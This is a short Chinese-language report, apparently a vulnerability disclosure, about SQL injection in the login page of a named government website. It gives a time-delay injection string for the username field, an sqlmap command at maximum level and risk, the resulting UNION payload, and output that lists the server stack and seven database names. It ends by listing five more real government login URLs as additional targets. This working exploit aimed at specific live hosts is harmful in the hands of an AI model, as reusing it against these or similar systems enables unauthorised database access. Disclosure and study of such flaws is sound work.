以http://qlgk.taixing.gov.cn/webpages/login_ex.aspx 为测试案例:
用户名处输入:aa' ;waitfor delay '0:0:5'--可进行时间延迟注入
使用burpsuit抓包后再使用sqlmap进行测试:
$ sqlmap -r /tmp/qlgk.taixing.gov.cn.dat -p Ctr_Username –level 5 –risk 3 --dbs -v 1
---
Place: POST
Parameter: Ctr_Username
Type: UNION query
Title: Generic UNION query (NULL) - 24 columns
Payload: __VIEWSTATE=/wEPDwULLTE1Njc4NDUzODZkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQNsb2fUgnq6GIZiANkhmvgLro1L+PHEbQ==&__EVENTVALIDATION=/wEWBQKY7bHbAgLo0
rLEAgLTnqPgBQKL1YrVCgL83/+4CTx6Ga/EIqF88OuCwIW83Yd8PdXk&Ctr_Username=qq' UNION ALL SELECT 22,22,22,22,22,22,22,22,22,22,22,22,CHAR(113)+CHAR(102)+CHAR(119)+CHAR(104)+CHA
R(113)+CHAR(108)+CHAR(115)+CHAR(79)+CHAR(66)+CHAR(78)+CHAR(87)+CHAR(78)+CHAR(76)+CHAR(70)+CHAR(73)+CHAR(113)+CHAR(108)+CHAR(115)+CHAR(108)+CHAR(113),22,22,22,22,22,22,22,22,22,22,22-- &Ctr_Password=a&log.x=15&log.y=6
---
[13:52:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [7]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] txgkptweb
[*] txweb
[*] tzmszj
其他测试案例:
http://58.222.216.220/ggweb/webpages/login_ex.aspx
http://qlgk.taixing.gov.cn/webpages/login_ex.aspx
http://qlgk.taizhou.gov.cn/tzptweb/webpages/login_ex.aspx
http://58.222.195.110:8081/jyweb/webpages/login_ex.aspx
http://58.222.211.21/xhweb/webpages/login_ex.aspx
